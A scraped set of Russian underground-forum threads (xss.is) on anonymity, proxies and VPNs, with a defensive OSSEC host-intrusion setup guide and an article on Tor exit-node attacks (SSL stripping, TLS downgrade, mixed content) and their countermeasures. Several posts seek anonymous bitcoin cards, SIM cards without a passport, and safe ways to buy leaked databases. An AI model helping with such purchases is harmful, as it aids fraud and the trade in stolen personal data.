Как только устройства будут внутри, можно посадить крышку на клей или закрепить ее болтами, чтобы придать клетке прочности. Неплохо будет закрепить такую клетку на деревянной балке или прикрепить ее к стене при помощи металлических скоб, чтобы устройство стало более прочным.

Советы

Не пытайтесь использовать в качестве клетки Фарадея такие электроприборы, как холодильник или микроволновая печь. Они не смогут обеспечить достаточный уровень защиты.

Вместо пищевой пленки в качестве изоляционных слоев можно использовать резину.

Токопроводящие слои можно сделать и из других материалов, проводящих ток типа меди, но это будет дороже.

Редирект обращений

ID: 676533bbb4103b69df371a53
Thread ID: 56460
Created: 2021-09-09T08:19:02+0000
Last Post: 2023-06-09T15:35:23+0000
Author: SovietUnicorn
Replies: 7 Views: 378

Наилучшего времени суток товарищи форумчане!)
Почитав статьи,мануалы и обсуждения задался вопросом
Возможно ли реализовать редирект обращений и запросов к машине + логирование откуда стучат?
Нужно переписывать драйвер? Ковырять сокет? Или же хватит какого то дефолтного шлюза с фаерволом?
Наш великий и ужасный гуголд мой ключевой запрос жуёт и высерает статью на тему НАСТРОЙКИ БРАНДМАУЕРА ШИНДОУС и тд

зы: Прошу не кидаться тапками в новокека ведь гордое незнание хуже вопроса)

проксификация хромиум профилей

ID: 676533bbb4103b69df371c01
Thread ID: 51521
Created: 2021-05-07T18:56:24+0000
Last Post: 2021-05-07T22:19:17+0000
Author: xryaker
Replies: 2 Views: 377

Есть линукс.
Подскажите как завернуть сеть отдельно взятого профиля хромиума в сокс5 где нужна авторизация. проксичайн не перевариват хром.
Либо как то с пробросом на локальный ип. а локальный пробрасывал далее с скрипт или утилиту где прописать уже внешний сокс порт логин пасс

Тот же плагин фоксипрокси у мозилы норм принимает логи пасс от прокси. а у хрома хз что за поделка с костылями.
В идеале решение без плагинов
Спасибо

Телеграм,VPN прокси

ID: 676533bbb4103b69df3718f1
Thread ID: 128582
Created: 2024-12-09T17:02:19+0000
Last Post: 2024-12-09T22:08:54+0000
Author: Maroipklds
Replies: 3 Views: 372

Если подключиться к VPN затем поставить в Tg Proxy будет ли идити трафик через VPN>Proxy>Tg?

Организация рабочей среды !?

ID: 676533bbb4103b69df371b0a
Thread ID: 67722
Created: 2022-05-27T08:26:32+0000
Last Post: 2022-05-31T09:00:40+0000
Author: f1x
Replies: 4 Views: 372

**Всем салют
Давно завдавлся вопросом создания безопасной,анонимной рабочей среды на базе VPS.

Погуглил, полистал форумы и решил поинтереосваться сам.

Буду рад услышать ваши цепочки и вариаци анонимизации и безопасного подключения к VPS.
Не исключаю то что мыслю узко и есть способы более удобные и безопасности нежели VPS.(очевидно что таковы имеются)
Буду рад любой инфе.
**

Публичные списки прокси, где взять много?

ID: 676533bbb4103b69df371ba6
Thread ID: 56484
Created: 2021-09-09T16:54:23+0000
Last Post: 2021-09-11T04:50:56+0000
Author: JohnBolt
Replies: 5 Views: 371

Не секрет, что многие сервисы, предлагающие "10 тыс прокси за 3$ в неделю", по сути работают по следующей схеме, что собирают с многих сайтов в интернете списки прокси, проверяют их и уже продают.

У меня прокси ферма, тоже работает по такому принципу, но я пользовался двумя китайскими сайтами, которые давали в день по 5-10к новых прокси и все было нормально, но сейчас они ушли в оффлайн. Пробежался по гуглу, после тестирования только следующие сайты отдают на одной страничке списки где больше 1000 прокси

You must have at least 1 reaction(s) to view the content.

Откуда еще можно скачивать списки публичных прокси? вот не хочется перебирать кучу страничек, на каждой из которых по 10 прокси.

Какой VPN использовать для повседневных нужд?

ID: 676533bbb4103b69df371ad0
Thread ID: 71446
Created: 2022-08-10T18:28:04+0000
Last Post: 2022-08-22T16:57:17+0000
Author: DigitalScout
Replies: 3 Views: 369

Нужен добротный, с не заезженными серверами. Чтобы сайты и приложения меня не распознавали, как пользователя VPN. Анонимность не важна.
Если есть также варианты купить дешевле официальной стоимости или получить бесплатно - пишите сразу.

Need anonymous Virtual Card Provider

ID: 676533bbb4103b69df371bad
Thread ID: 56260
Created: 2021-09-04T05:14:39+0000
Last Post: 2021-09-04T05:14:39+0000
Author: drpalpatine
Replies: 0 Views: 368

Recommend a anonymous virtual card provider for online shopping internationally
should be able to buy with bitcoin

ezzocard.com --> has a limit of $900 only

I need limits of minimum $1500

Suggest me one urgent

Устанавливаем пароль на браузер Chrome

ID: 676533bbb4103b69df371c39
Thread ID: 48318
Created: 2021-02-18T21:05:12+0000
Last Post: 2021-02-18T21:05:12+0000
Author: ZERO
Replies: 0 Views: 366

You must have at least 1 message(s) to view the content.

**

Бонус:

You must have at least 1 message(s) to view the content.

Если захотеть, можно и горы свернуть, кроме определенных, но там кейлогер в помощь вам.

HIDS и OSSEC в качестве инструмента. Обеспечиваем безопасность хостов.

ID: 676533bbb4103b69df371926
Thread ID: 123639
Created: 2024-09-27T18:35:20+0000
Last Post: 2024-09-27T18:35:20+0000
Author: n0_mad
Prefix: Статья
Replies: 0 Views: 364

Автор: NomadSP
Источник: XSS.is

Сетевая безопасность это важный аспект любой инфраструктуры, так как связь с внешним миром это как преимущество в работоспособности, так и уязвимость, которая без должного внимания со стороны безопасника, является критической брешью.

Однако, многие, концентрируясь на сетевой безопасности, забывают о том, что потенциальные угрозы возникают и на уровне аппаратном, то есть - отдельных устройств. Поэтому, я считаю необходимым разобрать HIDS и методы обеспечения защиты от угроз.

Для начала, что такое HIDS.

HIDS, Host-based Intrusion Detection Systems - это инструменты безопасности, которые устанавливаются на отдельных устройствах (хостах) для мониторинга и анализа их активности. Основная цель HIDS - выявление подозрительных действий и потенциальных угроз на уровне конкретного устройства.

Поэтому, сегодня мы разберём несколько инструментов и научимся их настраивать для получения максимальной отдачи.

OSSEC.

OSSEC - это мощная система обнаружения вторжений, которая поддерживает множество платформ и предлагает функции мониторинга логов, проверки целостности файлов и анализа.

Именно с ней мы и будем работать, так как этот инструмент свободно доступен на GitHub.

Шаг 1. Установка.

Bash:Copy to clipboard

wget https://github.com/ossec/ossec-hids/archive/refs/tags/3.6.0.tar.gz tar -zxvf 3.6.0.tar.gz cd ossec-hids-3.6.0 ./install.sh

Установщик предложит нам 2 разных типа:
_1. Локальный.
2. Серверный. _
Исходя из ваших требований, вы можете выбрать удобный вариант.

Шаг 2. Конфигурация.

Обычно файл конфигурации находится по пути: /var/ossec/etc/ossec.conf , поэтому предлагаю настроить правила, агенты и другие параметры.

Открываем файл конфигурации.

Bash:Copy to clipboard

sudo nano /var/ossec/etc/ossec.conf

Шаг 3. Настраиваем основные параметры.

В файле вы можете настраивать разные параметры, такие как:
1. Логи.
2. Правила мониторинга.
3. Агенты.

Пример базовой конфигурации выглядит примерно следующим образом:

XML:Copy to clipboard

<ossec_config> <global> <email_notification>yes</email_notification> <email_to>example1@xss.is</email_to> <email_from>example2@xss.is</email_from> <smtp_server>smtp.example.com</smtp_server> <log_level>3</log_level> </global> <localfile> <location>/var/log/auth.log</location> </localfile> <rules> <include>rules_config.xml</include> </rules> </ossec_config>

Сохраняем изменения и выходим из редактора(Ctrl+0, Ctrl+X).

Шаг 4. Перезапускаем OSSEC.

Для применения изменений необходимо перезапустить сервис:

Bash:Copy to clipboard

sudo systemctl restart ossec

Шаг 5. Установка агента.

Для того, чтобы получать данные о каждом агенте(клиенте) необходимо установить OSSEC на целевом устройстве с помощью команды из Шаг 1.

Шаг 6. Выбор типа установки.

Во время установки выбираем "Agent".

Шаг 7. Настраиваем агента.

Открываем конфигурационный файл с помощью:

Bash:Copy to clipboard

sudo nano /var/ossec/etc/ossec.conf

Нам необходимо указать IP или имя хоста вашего сервера, на котором установлен OSSEC:

XML:Copy to clipboard

<client> <server-ip>YOUR_SERVER_IP</server-ip> </client>

После добавления, так же сохраняем и выходим из редактора.

Шаг 8. Перезапускаем агент.

Bash:Copy to clipboard

sudo systemctl restart ossec

Шаг 9. Добавляем агента в мастер клиент на сервере.

На сервере, где установлен OSSEC необходимо выполнить следующую команду для добавления нового агента:

Bash:Copy to clipboard

sudo /var/ossec/bin/manage_agents

Выбираем "А"(add agent) и вводим его имя + IP.

Далее сохраняем изменения и закрываем утилиту управления агентами.

Шаг 10. Настраиваем ключ клиента.

После добавления агента, нам так же стоит получить ключ для него, выбрав в клиенте опцию "E"(extract key). Копируем сгенерированный ключ к себе.

Далее снова выполняем команду по открытию утилиты управления агентами и выбираем опцию "I"(import keys) и вставляем туда наш созданный ключ.

Шаг 11. Перезапускаем агент и проверяем статус.

Перезагружаем агента командой:

Bash:Copy to clipboard

sudo systemctl restart ossec

Проверяем статус подключения агента на сервере:

Bash:Copy to clipboard

sudo /var/ossec/bin/agent_control -l

К слову, это покажет список всех активированных агентов и их статусы.

Таким образом мы получаем настроенный OSSEC на сервере, который так же будет проводить мониторинг активности на устройстве, куда он был установлен.

Правила, логгирование, агенты это всё настраиваемо, например, создадим файл правил local_rules.xml в директории /var/ossec/etc/rules/ , чтобы правила срабатывали при попытке входа через SSH(правило 10001), несанкционированном подключении через IP(правило 10002) и использовании команды sudo на устройстве(правило 10003).

XML:Copy to clipboard

<?xml version="1.0"?> <group name="local,"> <rule id="100001" level="5"> <decoded_as>syslog</decoded_as> <field name="program">sshd</field> <description>Попытка входа через SSH</description> <options>no_full_log</options> </rule> <rule id="100002" level="10"> <decoded_as>syslog</decoded_as> <field name="srcip">192.168.1.100</field> <description>Подозрительный IP-адрес</description> <options>no_full_log</options> </rule> <rule id="100003" level="7"> <decoded_as>syslog</decoded_as> <field name="program">sudo</field> <description>Использование sudo</description> <options>no_full_log</options> </rule> </group>

Так же мы проставили уровни важности, исходя из приоритетов(5, 7 и 10).

Не забываем, что нам необходимо применить правила в файле конфигурации /var/ossec/etc/ossec.conf

Выглядят необходимые строки в файле как:

XML:Copy to clipboard

<rules> <include>rules/local_rules.xml</include> </rules>

Далее перезапускаем OSSEC для применения нововведений.
В целом, нам бы хватило и этого, но получаемые выводы надо так же связать с системами мониторинга и реагирования, поэтому рассмотрим подобную опцию.

Интеграция OSSEC с Samhain и Zabbix Sender.

Данная интеграция - отличный способ обеспечить многоуровневую защиту.

Samhain - является инструментом для мониторинга целостности файлов и обнаружения вторжений, который поддерживает ещё и сетевой мониторинг, как, собственно, и Zabbix. Приступим к настройке нашей связки.

Шаг 1. Устанавливаем Samhain.

Bash:Copy to clipboard

sudo apt install samhain

Шаг 2. Настраиваем файл конфигурации.

Откроем файл:

Bash:Copy to clipboard

sudo nano /etc/samhain/samhain.conf

Пример:

Code:Copy to clipboard

# Уровень отчетности log_level = 3 # 0 - только ошибки, 1 - предупреждения, 2 - информация, 3 - отладка # Путь к логам OSSEC ossec_log_path = "/var/ossec/logs/ossec.log" # Настройки отслеживания событий track_events = yes # Конфигурация мониторинга файловой системы monitor_files = ( "/etc", "/usr/bin", "/usr/sbin", "/var/log", "/var/ossec/logs" ) # Настройки уведомлений notify_on_event = yes notify_email = "example@xss.is" # Уровень чувствительности sensitivity_level = 5 # 1 - низкий, 5 - высокий # Параметры проверки целостности check_interval = 600 # Проверять каждые 10 минут # Настройки для исключений exclude_paths = ( "/var/log/lastlog", "/var/run", "/tmp" )

Пояснения:
-log_level: Указывает уровень детализации логирования. Чем выше число, тем больше информации будет записано.
- ossec_log_path: Путь к логам OSSEC, которые будут отслеживаться Samhain.
- track_events: Включает или отключает отслеживание событий.
- monitor_f iles: Указывает директории, которые будут мониториться на изменения.
- notify_on_event: Включает уведомления при возникновении событий.
- notify_email: Указывает адрес электронной почты для отправки уведомлений.
- sensitivity_level: Уровень чувствительности для мониторинга изменений. Более высокий уровень означает более строгие проверки.
- check_interval: Интервал между проверками целостности файловой системы в секундах.
- exclude_paths: Список путей, которые не будут отслеживаться.

Я привёл в пример довольно базовые настройки, поэтому адаптировать их необходимо под ваши нужды.

Шаг 3. Интегрируем с OSSEC.

Для отправки уведомлений нам необходимо в нашем файле конфигурации на сервере /var/ossec/etc/ossec.conf добавить секцию уведомлений:

XML:Copy to clipboard

<alerts> <command>your_custom_script.sh</command> </alerts>

Где your_custom_script.sh - скрипт, вызываемый при срабатывании тригера.

Шаг 4. Создаём скрипт для передачи данных.

Нам необходимо обрабатывать уведомление от OSSEC и передавать их в Samhain, поэтому выполняем команду:

Bash:Copy to clipboard

sudo nano /usr/local/bin/ossec_to_samhain.sh

Добавляем содержимое, например:

Bash:Copy to clipboard

echo "$1" >> /var/log/samhain/ossec_alerts.log

Сохраняем и не забываем сделать скрипт исполняемым:

Bash:Copy to clipboard

sudo chmod +x /usr/local/bin/ossec_to_samhain.sh

Итак, мы получили связь OSSEC и Samhain, однако для отправки уведомлений нам понадобится Zabbix Sender, поэтому перейдём прямиком к нему.

Интеграция Samhain и Zabbix Sender.

Шаг 1. Установка Zabbix.

На нашем сервере с остальными утилитами устанавливаем Zabbix Sender:

Bash:Copy to clipboard

sudo apt install zabbix-sender

Шаг 2. Создаём скрипт алертов.

Bash:Copy to clipboard

sudo nano /usr/local/bin/samhain_to_zabbix.sh

В скрипте можно прописать, например:

Bash:Copy to clipboard

while IFS= read -r line; do zabbix_sender -z YOUR_ZABBIX_SERVER_IP -s "YOUR_HOSTNAME" -k "samhain.alert" -o "$line" done < /var/log/samhain/ossec_alerts.log

Значения YOUR_ZABBIX_SERVER_IP и YOUR_HOSTNAME необходимо заменить на релевантные.

Шаг 3. Настройка cron.

Для периодической отправки алертов Zabbix, настроим так же задачу в cron через:

Bash:Copy to clipboard

crontab -e

К примеру, можно использовать такое правило:

Bash:Copy to clipboard

*/5 * * * * /usr/local/bin/samhain_to_zabbix.sh

Таким образом, вся строка говорит о том, что скрипт /usr/local/bin/samhain_to_zabbix.sh будет запускаться каждые 5 минут, независимо от времени суток, дня месяца, месяца и дня недели.

Теперь ваши алерты так же связаны с Zabbix, что позволит своевременно реагировать на какие-либо попытки проникновения.

Zabbix + Grafana.

Как нам уже известно, Grafana позволяет нам визуализировать дашборды, а, беря данные из Zabbix, мы так же можем отслеживать данный из созданного нами контура.

Предполагаем, что Grafana у нас уже установлена, поэтому мы переходим в Web- интерфейс через: http://<ваш_IP>:3000

Далее нажимаем на "+" и выбираем "Dashboard" -> "Add panel" -> Выбираем тип панели(например, "Graph").

Нажимаем на выбор "Data sources" -> "Add data source" -> Zabbix.

В разделе "Metric" выберите нужный элемент (например, host, item, trigger).
Укажите параметры, такие как:
-Host: Выберите хост, данные с которого вы хотите отображать.
- Key: Укажите ключ элемента, который вы хотите визуализировать.
- Time Range: Настройте временной диапазон для отображения данных.

После всех настроек мы получим настроенную связку для определения проникновений, мониторинга, реагирования и отслеживания метрик в виде OSSEC + Samhain + Zabbix Sender + Grafana.

Заключение.

Подобная настройка не раз использовалась в отслеживании каких-то посторонних действий, на которые необходимо обратить внимание. Покрывая потребность всего цикла обеспечение безопасности хоста, это не является панацеей, а так же требует довольно тонкой настройки на нужные вам параметры, но однозначно добавит определённый уровень безопасности вашей инфраструктуры. Я настоятельно рекомендую потратить время на всевозможные процедуры определения векторов угроз и конфигурирования ваших правил отслеживания подобных уязвимостей.

До скорых встреч!

Где купить белорусские симки без паспорта?

ID: 676533bbb4103b69df371bb1
Thread ID: 56006
Created: 2021-08-29T16:21:23+0000
Last Post: 2021-08-31T15:09:50+0000
Author: Elfover
Replies: 2 Views: 363

Вечер добрый! На данный момент столкнулся с проблемой, что черный рынок в РБ не развит от слова совсем и возможности купить нормально симки без паспорта не представляется возможным. Понаписывал в кучу сервисов и все как один на зло не отвечают. Что можете подсказать по решению этого недоразумения?

Безопасность при покупке дампов и БД

ID: 676533bbb4103b69df371a3f
Thread ID: 92704
Created: 2023-07-11T19:28:53+0000
Last Post: 2023-07-12T04:33:30+0000
Author: smartkiparis
Prefix: Статья
Replies: 1 Views: 358

Добрый день
Насколько безопасно покупать сливы через Breached?
Что можно предпринять, чтобы обезопасить себя в процессе оплаты и непосрдественной загрузки?
Простите за банальные вопросы, но впервые планирую это делать

Whonix + Lokinet

ID: 676533bbb4103b69df371a50
Thread ID: 90379
Created: 2023-06-14T06:47:21+0000
Last Post: 2023-06-14T06:47:21+0000
Author: Argos
Replies: 0 Views: 358

А какой смысл в такой связке?

Атаки на соединения в Tor: как (не)проебать шифрование

ID: 676533bbb4103b69df371a42
Thread ID: 92318
Created: 2023-07-07T15:18:33+0000
Last Post: 2023-07-07T15:18:33+0000
Author: baykal
Prefix: Статья
Replies: 0 Views: 357

Атаки на соединения в Tor: как (не)проебать шифрование

автор @torinmyheart
источник: rutor[.]wtf

Это продолжение и развитие темы "Как работает DNS в Tor и почему попытки его улучшить сделают только хуже". Ознакомьтесь с первой статьёй, если ещё не читали или успели забыть прочитанное.

Итак, напомню на чём мы остановились.
Bob поднял выходную ноду Tor, запустил свои зловредные алгоритмы и затаился в ожидании жертвы.
Alice заходит в Tor и ощущает себя в полной безопасности, не подозревая, что на неё открыта охота.

Почему защищать DNS-запросы - это бесполезное занятие
В предыдущей статье мы выяснили, что выходная нода Tor видит DNS-запросы и может подменять ответы. Представим, что Alice не послушала мои рекомендации и включила DoH (DNS over HTTPS) в Tor, пожертвовав анонимностью ради лучшей защиты соединения. Что же поменялось?

Не верно. Действительно, выходная нода не может вмешаться в процесс общения по протоколу DoH и мы получим истинный IP (если только DNS-сервер не был заражён). Однако, сразу после этого следует установка связи с искомым сервером, и тут выходная нода с лёгкостью может направить нас на любой другой IP.

Не верно. Действительно, выходная нода не сможет посмотреть какие домены Alice ищет в DNS. Однако, сразу после этого браузер Alice начинает строить HTTPS-соединение. Этот процесс не моментальный, он начинается с обмена данными в открытом виде. В числе других, в открытом виде передаётся заголовок SNI (Server Name Indication), который содержит доменное имя. Bob это видит.
На данный момент (начало 2022 года) заголовок SNI передаётся в открытом виде даже в самой последней версии TLS 1.3. Рабочих способов это исправить пока нет.
Но так будет не всегда...

Spoiler: Как эволюция TLS нагнёт государственную цензуру интернета

Открытый заголовок SNI - это подарок для любого средства интернет-цензуры.

Важные для понимания термины:
Handshake - это процесс "знакомства" сервера и юзера, иными словами, процесс строительства зашифрованного HTTPS-соединения
ClientHello - первый этап процесса handshake, все данные на этом этапе передаются в открытом виде
SNI (Server Name Indication) - заголовок (параметр), который передаётся на этапе ClientHello и содержит искомое доменное имя

О шифровании SNI задумались очень давно, но долгое время поиск решений был безуспешным. Причина кроется в архитектуре handshake: чтобы зашифровать SNI, нужно получить сертификат, а чтобы получить сертификат, нужно отправить серверу SNI. Это замкнутый круг.

Вскоре после выпуска TLS 1.3 придумали ESNI (Encrypted SNI), в тестовом варианте даже завезли поддержку в Firefox. Однако, ESNI быстро исчерпал свой потенциал и имел существенные недостатки. Идея трансформировалась в новую концепцию - ECH (Encrypted ClientHello). Как видно из названия, тут шифрует не только заголовок SNI, а весь этап ClientHello. Пока это эксперементальная технология, но, вероятнее всего, именно она выйдет из черновика и продвинет конфиденциальность в интернете на новый уровень.

ECH подразумевает двойной ClientHello: один открытый, второй внутри первого и уже зашифрованный. Благодаря этому можно скрыть доменное имя и даже истинный IP-адрес сервера с помощью перенаправления в зашифрованном ClientHello. Если сильно упростить: это работает как VPN, встроенный в протокол HTTPS.
DoH + https+ECH - вот только в таком соединении DoH будет работать "в полную силу". Эта технология при массовом распространении способна отправить в музей все DPI разом. И конечно, это даст возможность скрыть от выходных нод Tor информацию о том, каким сайтам вы обращаетесь.

Остаётся только дождаться, когда разработка спецификации ECH будет завершена. Для работы ECH требуется поддержка со стороны серверов, браузеров и даже DNS- серверов, поэтому процесс распространения может затянуться на долгие годы.

Хорошо, что это только размышления и Alice не стала включать DoH в Tor.

Как работает HTTPS
Именно этот механизм отвечает за соответствие домена и сервера. Залезем к нему под капот.

TLS (transport layer security) - протокол для зашифрованнного обмена данными.
SSL - предшественник TLS, его старая версия, считается уязвимой и небезопасной.
HTTP - протокол передачи данных в открытом виде.
HTTPS - расширение протокола HTTP, которое использует ~~SSL~~ (может, но уже не должен) или TLS для шифрования передаваемых данных.

Правильно настроенный HTTPS выполняет две основные задачи:

Подтверждает соответствие домена и сервера, чтобы никто, кроме подлинного сервера, не мог вести обмен данными с клиентом.

Шифрует данные таким образом, чтобы посредник (внешний наблюдатель) не мог прочитать или изменить их. Шифрование должно обладать прогрессивной секретностью (forward secrecy), что означает:

Бесполезно сохранять зашифрованный трафик для дальнейших попыток его расшифровать. Сделать это не подучится благодаря стойким шифрам (алгоритмам шифрования).

Утечка секретного ключа (который хранится на сервере) не поможет расшифровать сохранённый ранее трафик. Для этого каждому сеансу генерируется свой ключ.

Сейчас (начало 2022) актуальны только TLS 1.2 и TLS 1.3 , они поддерживаются современными браузерами, пути эксплуатации обнаруженных уязвимостей закрываются. Обе версии протокола достаточно безопасны, открытых критических уязвимостей в них сейчас нет. Но отличаются они значительно.

TLS 1.2

Опубликован в 2008 году.

Архитектурно похож на TLS 1.1, разработан как улучшенная его версия с целью устранить изъяны безопасности, но сохранить совместимость с устройствами и поддержку широкого списка используемых на тот момент шифров. Это компромисс между безопасностью и совместимостью.

По мере развития многие функции обратной совместимости исключались из протокола в угоду безопасности, однако, даже современная версия протокола в наследство получила поддержку устаревших шифров.

Браузеры продолжают поддерживать протокол TLS 1.2. Исключаются из поддержки только уязвимые шифры. А для слабых шифров браузеры применяют меры предотвращения атак и смягчения последствий. Протокол TLS 1.2 можно считать безопасным только в сочетании с современным браузером.

TLS 1.3

Опубликован в 2018 году.

На предыдущую версию 1.2 совсем не похож. TLS 1.3 - это не улучшение старого протокола, это уже новый протокол.

Разработан с упором на безопасность, без сомнительных компромиссов. Не наследует плохие решения от предыдущих версий, поддерживает только безопасные стойкие шифры.

Обладает высоким уровнем надёжности, со временем TLS 1.3 станет минимальной безопасной версией протокола.

TLS-сертификат - [упрощённо] сборка, включающая в себя ключ и информацию о сервере, которая обычно подписана третьей стороной (CA, центром сертификации).
CA [ЦА] - центр сертификации, та самая третья сторона. Например, Let’s Encrypt.

За соответствие домена и сервера отвечает TLS-сертификат (то, что обычно именуют HTTPS). Для подтверждения подлинности используется цепочка сертификатов. Объясню упрощённо и наглядно.
View attachment 52978
Certificate 1/2/3/n - это сам TLS-сертификат сайта.
Intermediate CA , Root CA - это сертификаты, которые принадлежат центрам сертификации.
Далее всю задачу решают два простых условия:

Центры сертификации, прежде чем подписать Certificate-1/2/3/n, всегда проверяют, что он принадлежит именно владельцу домена.

Браузеры будут считать Certificate-1/2/3/n подлинным только при наличии подписи от доверенного CA. Список доверенных CA вшит в браузеры.

При установке HTTPS-соединения в открытом виде передаётся только доменное имя. Полный URL передаётся после установления соединения в зашифрованном виде.
_Примеры (_красное _- открыто;_зелёное - зашифровано):
**https://``gnu.org``/philosophy/free-sw.html
https://``wery-secret-private-site.org``/secret-path-to-secret-document- jqakajcoorvxfmghnwm/

Bob атакует Alice**
Раздел относится только к доменам клирнета

По случайности Alice сразу попадает на выходную ноду, которую контролирует Bob. Разберёмся что может натворить этот негодяй.

*Tor - имеется в виду обычный Tor-браузер и версия Tor на Whonix. Всё, что написано в данной статье, актуально для обоих браузеров.

| Ситуация| Методы атаки| Методы защиты
---|---|---|---
1| Alice открывает сайт, не имеющий версии HTTPS.
Например: darkseller.org| Обычный MITM (Man In The Middle, человек посередине) в элементарных условиях. Тут нет никакого шифрования, поэтому Bob видит всё: и домен, и полный URL-адрес, и все данные, которыми Alice обменивается с сервером. Всё это Bob может логировать и подменять "налету", незаметно для Alice.| Методов защиты не существует. Не следует использовать сайты по HTTP.
В качестве исключения можно посещать такие сайты только с целью прочитать некоторую не важную информацию (статью, анекдот). Нельзя использовать ссылки, счета, кошельки и что-либо, размещённое на сайте. По внешним ссылкам переходить тоже не следует.
Рекомендация
Во всех браузерах Tor (включая браузер на Whonix) поставить средний уровень безопасности:
Открыть about:preferences#privacy (через адресную строку как обычную ссылку), найти заголовок "Security " ("Защита ") и установить значение "Safer " ("Высокий ").
Помимо прочего, это запретит JS на сайтах без защиты, из-за чего Bob не сможет заставить браузер Alice исполнять его JavaScript код.
2| Alice вводит в адресную строку ссылку без указания протокола| Интересная особенность. В этом случае браузер автоматически выбирает протокол HTTP и сперва пытается подключиться без шифрования (есть исключения в виде предзагрузки HSTS, но об это расскажу в другом разделе).
Bob может этим воспользоваться:

Удалить перенаправление на HTTPS и заставить Alice пользоваться оригинальным сайтом без шифрования (при этом даже не обязательно, чтобы оригинальный сайт поддерживал небезопасный HTTP). В адресной строке будет настоящий домен, но рядом с ним будет иконка с перечёркнутым замком (что может броситься в глаза Alice). В этом случае сценарий переходит к пункту 1. Это называется SSL (TLS) stripping (во времена SSL у этой атаки было больше векторов, но и сейчас она работает).

Перенаправить Alice на фишинговый домен. В этом случае подозрительной иконки не будет, будет только немного отличаться домен, но это Alice заметить уже сложнее. Соединение будет зашифровано, но "на том конце" вместо настоящего сервера будет поддельный, которым владеет Bob. Таким образом, Alice открывает настоящий домен, но всё равно попадает на фишинг.

| Сохраняя ссылки, всегда следует приписывать к ним протокол. Примеры:
Неправильно http://eff.org
Тоже неправильно eff.org
Правильно https://eff.org
И, конечно, копировать ссылку нужно только вместе с протоколом. Не забывайте об этом, когда передаёте ссылку другим людям.

Проверьте, чтобы ваши ссылки были сохранены именно в таком формате.

Актуально только для ссылок клирнета, к onion не относится.
3| Для реализации этого типа атаки от Alice не требуется никаких действий, она может открывать сайты правильно (как рекомендуется в пункте 2) или просто переходить по ссылкам (ссылка может скрываться под любой кнопкой).| Bob, вмешиваясь в процесс установления соединения, пытается убедить обе стороны (Alice и сервер) использовать устаревшие уязвимые версии протокола TLS (или даже SSL). Если ему это удастся, то формально соединение HTTPS будет установлено, но на деле Bob сможет вскрыть шифрование и прослушивать соединение. Это атака TLS Downgrade.

В данном случае браузер Alice настроен именно на HTTPS-соединение, поэтому подложный редирект на HTTP не сработает (Alice получит ошибку установления безопасного соединения, если только браузер не слишком старый). Если TLS Downgrade не удаётся (браузер и/или сервер не поддерживают старые протоколы), Bob может просто препятствовать установлению HTTPS-соединения (цель этого не вполне понятна, но Bob это может).|

Браузер и систему нужно держать в актуальном стостоянии, регулярно обновлять. Особенно часто забывают обновлять виртуалки whonix, а ещё чаще забывают обновлять Gateway. Если вы давно не делали этого - сделайте прямо сейчас. Вот команда для whonix и других дистрибутивов семейства debian:
sudo apt update&& sudo apt upgrade

Современный Firefox (и Tor тоже) по-умолчанию не поддерживает старые версии протокола TLS.
За это отвечает настройка в конфигах браузера, которую довольно легко случайно сбить, поэтому нужно её проверить: открыть about:config , в поиске ввести security.tls.version.enable-deprecated , значение должно быть false.
На сайтах, которые требуют старые версии TLS, вы получите ошибку
View attachment 52979
Никогда не следует нажимать на кнопку "Enable TLS 1.0 and 1.1" ("Включить TLS 1.0 и 1.1"), это сразу переключит security.tls.version.enable-deprecated в небезопасное значение true, после чего придётся вручную возвращать false (и это обязательно).

Установить во всех браузерах HTTPS-Only Mode. Раньше для этого было дополнение HTTPS Everywhere , а сейчас его функционал встроен в браузеры на основе Firefox (значит и в Tor).
Открыть about:preferences#privacy , пролистать вниз и найти "HTTPS- Only Mode " ("Режим «Только HTTPS» "), переключить его на "Enable HTTPS- Only Mode in all windows " ("Включить режим «Только HTTPS» во всех окнах ").
Теперь браузер всегда будет перенаправлять вас на HTTPS, а при попадании на сайты без HTTPS вы будете получать предупреждение "Secure Connection Not Available" ("Защищённое соединение недоступно"). После нажатия кнопки "Continue to HTTP Site" ("Перейти на HTTP-сайт"), браузер больше не будет выдавать предупреждение на этом сайте в текущем сеансе, а вы попадаете в сценарий пункта 1. Пользуйтесь мерами безопасности из этого пункта.
Примечание: получив такое предупреждение, попробуйте вручную дописать https:// к адресу сайта, в редких случаях это помогает.

4| Для этой атаки Alice снова не придётся ничего делать. Это не совсем отдельный тип атаки, а скорее пункт 1, но в более сложных обстоятельствах.
Alice открывает сайт как положено, по HTTPS, но криворукие разработчики умудрились в коде сайта прописать загрузку некоторых элементов (или отправку данных) по HTTP.| Если сам сайт открывается по HTTPS, это ещё не означает, что остальной контент внутри страницы загружается только по HTTPS. Иногда часть данных сайт может получать/отправлять по HTTP, это называется Mixed content - смешанное содержимое.
По визуальным признакам понять что именно загружается без шифрования, невозможно, это может быть всё что угодно: форма с вашим паролем, адрес криптовалютного кошелька, изображение (например, адрес криптовалютного кошелька в qr-коде). На иконке замка в адресной строке может быть восклицательный знак, но не всегда.| От этого типа атак помогает защита из пункта 3, а также рекомендация из пункта 1.
Самое главное - включить HTTPS-Only Mode.
В таком случае загрузка контента по HTTP блокируется автоматически, а вот попытка что-то отправить на сайт по HTTP сопровождается предупреждением: "Информация, введённая вами на этой странице, будет отправлена по незащищённому соединению и может быть прочитана третьей стороной " ("The information you have entered on this page will be sent over an insecure connection and could be read by a third party "). Рекомендую всегда отменять это действие , иначе вы попадаете в пункт 1.
5| От Alice не требуется совершать никаких ошибок.| Перехват и расшифровка трафика.
Подобные атаки можно разделить на два типа:

перехват и расшифровка realtime (в реальном времени)
при этом расшифровать ранее перехваченный трафик невозможно

расшифровка ранее записанного трафика (отсутствие прогрессивной секретности, forward secrecy)

В Firefox в целях совместимости отключены ещё не все слабые шифры. Слабыми считаются в основном шифры на CBC (Cipher-Block Chaining, цепочки из защифрованных блоков), поддерживались такие шифры только до TLS 1.2 (включительно).

В данном случае слабый - это не обязательно уязвимый. Шифры на CBC считаются слабыми по причине многократного обнаружения в них уязвимостей на одних и тех же механизмах, несмотря на исправления. Cовременный Firefox (и Tor) поддерживает только те шифры на CBC, в которых нет открытых уязвимостей и которые обладают forward secrecy, поэтому прямой угрозы это не несёт. С учётом исторического опыта, шифры на CBC были признаны слабыми, в TLS 1.3 они не поддерживаются.

Из уязвимых и доступных для использования в современном браузере Tor я обнаружил только один: 3DES (triple DES). Атака на него называется sweet32 описана здесь: https://sweet32.info
К тому же, этот шифр, по мнению ssllabs, не обладает forward secrecy. Для реализации атаки требуется выполнить несколько сложных условий, которые в условиях Tor становятся ещё сложнее, но факт самой уязвимости это не отменяет.
